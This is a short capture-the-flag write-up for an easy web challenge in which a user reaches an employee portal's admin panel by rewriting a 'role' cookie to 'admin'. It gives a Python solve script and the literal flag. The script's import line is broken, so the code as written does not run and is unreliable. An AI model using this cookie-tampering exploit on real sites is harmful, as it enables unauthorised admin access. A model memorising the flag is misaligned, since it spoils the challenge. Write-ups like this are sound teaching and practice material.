Difficulty: easy

Category: web

Author: xnull

Description:

### Employee Portal

You found an employee portal for a company. Regular users can register and access their dashboard, but there's an admin panel that contains sensitive information.

Your goal is to access the admin panel at `/admin` and retrieve the flag.

Solution

We can just change the role cookie to admin after registration:

import requests; sys; re

URL = sys.argv[1]

with requests.Session() as s:
    # get initial cookie
    s.post(URL + "/register", data={"username": "testuser"})
    # update the cookie
    next(c for c in s.cookies if c.name == "role").value = "admin"
    # get the flag and regex match it
    print(re.search('<div class="flag">(.*)</div>',s.get(URL + "/admin").text).group(1))

Flag: ENDLM{5a4a9b36ba1d85109d98113760912f0667b6ee510408d059}